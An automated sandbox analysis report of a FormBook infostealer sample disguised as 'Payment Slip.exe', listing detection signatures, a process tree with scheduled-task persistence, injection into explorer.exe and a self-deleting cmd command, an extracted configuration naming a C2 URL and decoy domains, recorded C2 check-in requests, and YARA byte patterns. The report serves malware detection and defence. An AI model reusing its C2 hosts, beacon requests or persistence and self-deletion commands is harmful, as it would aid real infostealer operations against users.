Loading ...

Play interactive tourEdit tour

Windows Analysis Report Payment Slip.exe

Overview

General Information

Sample Name:Payment Slip.exe
Analysis ID:491436
MD5:3d0d9c87ea732caf417afa0b8af62267
SHA1:dfb1e57a9cf498310cb7287f4b5792cbcd8b3974
SHA256:95b6ba2be30399f87d20e021bee29f0eb46773b67407f3ed9987d22610d5249d
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Self deletion via cmd delete
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
.NET source code contains very large strings
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses schtasks.exe or at.exe to add and modify task schedules
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • Payment Slip.exe (PID: 4768 cmdline: 'C:\Users\user\Desktop\Payment Slip.exe' MD5: 3D0D9C87EA732CAF417AFA0B8AF62267)
    • schtasks.exe (PID: 6160 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\uVxomBuy' /XML 'C:\Users\user\AppData\Local\Temp\tmp4F38.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 4044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • Payment Slip.exe (PID: 5596 cmdline: C:\Users\user\Desktop\Payment Slip.exe MD5: 3D0D9C87EA732CAF417AFA0B8AF62267)
    • Payment Slip.exe (PID: 4824 cmdline: C:\Users\user\Desktop\Payment Slip.exe MD5: 3D0D9C87EA732CAF417AFA0B8AF62267)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cscript.exe (PID: 6500 cmdline: C:\Windows\SysWOW64\cscript.exe MD5: 00D3041E47F99E48DD5FFFEDF60F6304)
          • cmd.exe (PID: 6260 cmdline: /c del 'C:\Users\user\Desktop\Payment Slip.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.yuumgo.academy/qfff/"], "decoy": ["lakechelanwedding.com", "jengly.com", "alluresme.com", "axswallet.com", "meetmedubai.com", "kortzfamily.com", "whishfullittles.com", "mts-consultant.com", "amhoses.com", "hdaz2.xyz", "lkgsbx.com", "b0ay.com", "hlthits.com", "dicsordgift.com", "bearaconnect.com", "strategicpropertyventures.com", "158393097102.xyz", "officesetupofficesetup.com", "industrynewz.com", "uperionorthamerica.com", "bucksmobilenotary.com", "clangadget.com", "jolix123.com", "jch.computer", "suddennnnnnnnnnnn43.xyz", "binbin-ads.com", "yshowmedia.com", "studentpair.com", "switchsmartcloud.com", "vywubey.xyz", "timdixonpreferredadvisors.com", "sturlabas.com", "kisskissfallinlove.com", "ivyrtp.com", "agohmarket.com", "spiritair-tickets.com", "savon-el.com", "paccarfinanical.com", "appios.xyz", "auxilvascular.com", "takesatisfy.club", "noframespanishfly.com", "nordesmarcom.com", "hbportalweb.online", "adhdwhatelse.com", "reparamospc.com", "footballrun.online", "mygreatsport.com", "onloe.com", "wargasarawak.com", "bhagwatiretail.com", "00333v.com", "relativewifi.com", "transferarea.com", "abodhakujena.com", "covidworld.info", "hetuart.com", "legacytailors.com", "inafukutest.com", "tiplovellc.com", "fruit-joy.com", "bnzvb.com", "calaverascoffee.com", "interweavelife.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.782630909.0000000001760000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000005.00000002.782630909.0000000001760000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19b77:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000005.00000002.782630909.0000000001760000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16aa9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bbc:$sqlite3step: 68 34 1C 7B E1
    • 0x16ad8:$sqlite3text: 68 38 2A 90 C5
    • 0x16bfd:$sqlite3text: 68 38 2A 90 C5
    • 0x16aeb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c13:$sqlite3blob: 68 53 D8 7F 8C
    0000000D.00000002.934465123.0000000003320000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000000D.00000002.934465123.0000000003320000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19b77:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 25 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      5.2.Payment Slip.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        5.2.Payment Slip.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x7808:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18d77:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19e1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        5.2.Payment Slip.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x15ca9:$sqlite3step: 68 34 1C 7B E1
        • 0x15dbc:$sqlite3step: 68 34 1C 7B E1
        • 0x15cd8:$sqlite3text: 68 38 2A 90 C5
        • 0x15dfd:$sqlite3text: 68 38 2A 90 C5
        • 0x15ceb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15e13:$sqlite3blob: 68 53 D8 7F 8C
        0.2.Payment Slip.exe.2658590.1.raw.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
          5.2.Payment Slip.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
            Click to see the 2 entries

            Sigma Overview

            No Sigma rule has matched

            Jbx Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Found malware configurationShow sources
            Source: 00000005.00000002.782630909.0000000001760000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.yuumgo.academy/qfff/"], "decoy": ["lakechelanwedding.com", "jengly.com", "alluresme.com", "axswallet.com", "meetmedubai.com", "kortzfamily.com", "whishfullittles.com", "mts-consultant.com", "amhoses.com", "hdaz2.xyz", "lkgsbx.com", "b0ay.com", "hlthits.com", "dicsordgift.com", "bearaconnect.com", "strategicpropertyventures.com", "158393097102.xyz", "officesetupofficesetup.com", "industrynewz.com", "uperionorthamerica.com", "bucksmobilenotary.com", "clangadget.com", "jolix123.com", "jch.computer", "suddennnnnnnnnnnn43.xyz", "binbin-ads.com", "yshowmedia.com", "studentpair.com", "switchsmartcloud.com", "vywubey.xyz", "timdixonpreferredadvisors.com", "sturlabas.com", "kisskissfallinlove.com", "ivyrtp.com", "agohmarket.com", "spiritair-tickets.com", "savon-el.com", "paccarfinanical.com", "appios.xyz", "auxilvascular.com", "takesatisfy.club", "noframespanishfly.com", "nordesmarcom.com", "hbportalweb.online", "adhdwhatelse.com", "reparamospc.com", "footballrun.online", "mygreatsport.com", "onloe.com", "wargasarawak.com", "bhagwatiretail.com", "00333v.com", "relativewifi.com", "transferarea.com", "abodhakujena.com", "covidworld.info", "hetuart.com", "legacytailors.com", "inafukutest.com", "tiplovellc.com", "fruit-joy.com", "bnzvb.com", "calaverascoffee.com", "interweavelife.com"]}
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 5.2.Payment Slip.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.Payment Slip.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.782630909.0000000001760000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.934465123.0000000003320000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.782784962.0000000001790000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.734770163.000000000DA63000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.933954904.0000000001100000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.778404636.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.757013579.000000000DA63000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.934788453.0000000004FD0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.709746313.0000000003601000.00000004.00000001.sdmp, type: MEMORY
            Source: 5.2.Payment Slip.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
            Source: Payment Slip.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: Payment Slip.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: cscript.pdbUGP source: Payment Slip.exe, 00000005.00000002.785702615.00000000018A0000.00000040.00020000.sdmp
            Source: Binary string: wntdll.pdbUGP source: Payment Slip.exe, 00000005.00000002.785791059.0000000001960000.00000040.00000001.sdmp, cscript.exe, 0000000D.00000002.934852520.0000000005120000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: Payment Slip.exe, 00000005.00000002.785791059.0000000001960000.00000040.00000001.sdmp, cscript.exe
            Source: Binary string: cscript.pdb source: Payment Slip.exe, 00000005.00000002.785702615.00000000018A0000.00000040.00020000.sdmp

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49814 -> 45.39.212.49:80
            Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49814 -> 45.39.212.49:80
            Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49814 -> 45.39.212.49:80
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\explorer.exeNetwork Connect: 45.207.75.185 80
            Source: C:\Windows\explorer.exeDomain query: www.b0ay.com
            Source: C:\Windows\explorer.exeNetwork Connect: 75.102.22.71 80
            Source: C:\Windows\explorer.exeDomain query: www.00333v.com
            Source: C:\Windows\explorer.exeDomain query: www.interweavelife.com
            Source: C:\Windows\explorer.exeDomain query: www.yuumgo.academy
            Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
            Source: C:\Windows\explorer.exeDomain query: www.axswallet.com
            Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.211 80
            Source: C:\Windows\explorer.exeNetwork Connect: 45.39.212.49 80
            C2 URLs / IPs found in malware configurationShow sources
            Source: Malware configuration extractorURLs: www.yuumgo.academy/qfff/
            Source: Joe Sandbox ViewASN Name: XIAOZHIYUN1-AS-APICIDCNETWORKUS XIAOZHIYUN1-AS-APICIDCNETWORKUS
            Source: global trafficHTTP traffic detected: GET /qfff/?zVsX=A0Gd4dmxD4WpN&h0Dpm=EtMhOrO65XWqZe1V/yWpI1DgXrgEJw48YTYdNBZuHNrU3gzc/ZcPLe5HxHKJImHY7C2C HTTP/1.1Host: www.00333v.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /qfff/?zVsX=A0Gd4dmxD4WpN&h0Dpm=iDjkn8VHWDd5B+WgyzOmaYrOSSt87z3Zq6ekoRCiL96i4fBr+80owih/KVqhv8s04Bt0 HTTP/1.1Host: www.yuumgo.academyConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /qfff/?h0Dpm=0w7wS7Gxy1y5PVkYFF5lNTBCNhhGoi1bMCJY/cwIOuW+ZMKS9RSTzNeIK/4fDqykK2MY&zVsX=A0Gd4dmxD4WpN HTTP/1.1Host: www.b0ay.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /qfff/?zVsX=A0Gd4dmxD4WpN&h0Dpm=WUvvsVcot/hHbudm+hsx8n+3xo5kp+HgCKvLXtoOkn7qJe0B64lU7/LdjKxnrj37XfZ9 HTTP/1.1Host: www.axswallet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /qfff/?h0Dpm=vpb6mGWiOxgVIXv3RY5+KwgpuQ4maEKqCh4MrndOejQXnr3fUcd6GXEqF18QrWYsNfL0&zVsX=A0Gd4dmxD4WpN HTTP/1.1Host: www.interweavelife.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: Joe Sandbox ViewIP Address: 198.54.117.211 198.54.117.211
            Source: Payment Slip.exe, 00000000.00000002.712015304.00000000065E2000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
            Source: Payment Slip.exe, 00000000.00000002.708859665.0000000002601000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: Payment Slip.exe, 00000000.00000002.712015304.00000000065E2000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: Payment Slip.exe, 00000000.00000002.712015304.00000000065E2000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
            Source: Payment Slip.exe, 00000000.00000002.712015304.00000000065E2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: Payment Slip.exe, 00000000.00000002.712015304.00000000065E2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: Payment Slip.exe, 00000000.00000002.712015304.00000000065E2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: Payment Slip.exe, 00000000.00000002.712015304.00000000065E2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: Payment Slip.exe, 00000000.00000002.712015304.00000000065E2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
            Source: Payment Slip.exe, 00000000.00000002.712015304.00000000065E2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: Payment Slip.exe, 00000000.00000002.712015304.00000000065E2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: Payment Slip.exe, 00000000.00000002.712015304.00000000065E2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: Payment Slip.exe, 00000000.00000002.712015304.00000000065E2000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
            Source: Payment Slip.exe, 00000000.00000002.712015304.00000000065E2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: Payment Slip.exe, 00000000.00000002.712015304.00000000065E2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: Payment Slip.exe, 00000000.00000002.712015304.00000000065E2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: Payment Slip.exe, 00000000.00000002.712015304.00000000065E2000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: Payment Slip.exe, 00000000.00000002.712015304.00000000065E2000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: Payment Slip.exe, 00000000.00000002.712015304.00000000065E2000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: Payment Slip.exe, 00000000.00000002.712015304.00000000065E2000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: Payment Slip.exeString found in binary or memory: http://www.rspb.org.uk/wildlife/birdguide/name/
            Source: Payment Slip.exe, 00000000.00000002.712015304.00000000065E2000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: Payment Slip.exe, 00000000.00000002.712015304.00000000065E2000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
            Source: Payment Slip.exe, 00000000.00000002.712015304.00000000065E2000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: Payment Slip.exe, 00000000.00000002.712015304.00000000065E2000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
            Source: Payment Slip.exe, 00000000.00000002.712015304.00000000065E2000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
            Source: Payment Slip.exe, 00000000.00000002.712015304.00000000065E2000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: Payment Slip.exe, 00000000.00000002.712015304.00000000065E2000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: unknownDNS traffic detected: queries for: www.00333v.com
            Source: global trafficHTTP traffic detected: GET /qfff/?zVsX=A0Gd4dmxD4WpN&h0Dpm=EtMhOrO65XWqZe1V/yWpI1DgXrgEJw48YTYdNBZuHNrU3gzc/ZcPLe5HxHKJImHY7C2C HTTP/1.1Host: www.00333v.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /qfff/?zVsX=A0Gd4dmxD4WpN&h0Dpm=iDjkn8VHWDd5B+WgyzOmaYrOSSt87z3Zq6ekoRCiL96i4fBr+80owih/KVqhv8s04Bt0 HTTP/1.1Host: www.yuumgo.academyConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /qfff/?h0Dpm=0w7wS7Gxy1y5PVkYFF5lNTBCNhhGoi1bMCJY/cwIOuW+ZMKS9RSTzNeIK/4fDqykK2MY&zVsX=A0Gd4dmxD4WpN HTTP/1.1Host: www.b0ay.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /qfff/?zVsX=A0Gd4dmxD4WpN&h0Dpm=WUvvsVcot/hHbudm+hsx8n+3xo5kp+HgCKvLXtoOkn7qJe0B64lU7/LdjKxnrj37XfZ9 HTTP/1.1Host: www.axswallet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
            Source: global trafficHTTP traffic detected: GET /qfff/?h0Dpm=vpb6mGWiOxgVIXv3RY5+KwgpuQ4maEKqCh4MrndOejQXnr3fUcd6GXEqF18QrWYsNfL0&zVsX=A0Gd4dmxD4WpN HTTP/1.1Host: www.interweavelife.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

            E-Banking Fraud:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 5.2.Payment Slip.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.Payment Slip.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000002.782630909.0000000001760000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.934465123.0000000003320000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.782784962.0000000001790000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.734770163.000000000DA63000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.933954904.0000000001100000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.778404636.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000000.757013579.000000000DA63000.00000040.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000D.00000002.934788453.0000000004FD0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.709746313.0000000003601000.00000004.00000001.sdmp, type: MEMORY

            System Summary:

            barindex
            Malicious sample detected (through community Yara rule)Show sources
            Source: 5.2.Payment Slip.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.2.Payment Slip.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 5.2.Payment Slip.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 5.2.Payment Slip.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.782630909.0000000001760000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.782630909.0000000001760000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000D.00000002.934465123.0000000003320000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000D.00000002.934465123.0000000003320000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.782784962.0000000001790000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.782784962.0000000001790000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000006.00000000.734770163.000000000DA63000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000006.00000000.734770163.000000000DA63000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000D.00000002.933954904.0000000001100000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000D.00000002.933954904.0000000001100000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000005.00000002.778404636.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000005.00000002.778404636.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000006.00000000.757013579.000000000DA63000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000006.00000000.757013579.000000000DA63000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 0000000D.00000002.934788453.0000000004FD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 0000000D.00000002.934788453.0000000004FD0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Source: 00000000.00000002.709746313.0000000003601000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
            Source: 00000000.00000002.709746313.0000000003601000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
            Initial sample is a PE file and has a suspicious nameShow sources
            Source: initial sampleStatic PE information: Filename: Payment Slip.exe
            .NET source code contains very large stringsShow sources
            Source: Payment Slip.exe, Darwin.WindowsForm/SearchResults.csLong String: Length: 34816
            Source: 0.0.Payment Slip.exe.190000.0.unpack, Darwin.WindowsForm/SearchResults.csLong String: Length: 34816
            Source: 0.2.Payment Slip.exe.190000.0.unpack, Darwin.WindowsForm/SearchResults.csLong String: Length: 34816
            Source: 4.0.Payment Slip.exe.350000.0.unpack, Darwin.WindowsForm/SearchResults.csLong String: Length: 34816
            Source: 4.2.Payment Slip.exe.350000.0.unpack, Darwin.WindowsForm/SearchResults.csLong String: Length: 34816
            Source: Payment Slip.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: 5.2.Payment Slip.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.2.Payment Slip.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 5.2.Payment Slip.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.2.Payment Slip.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
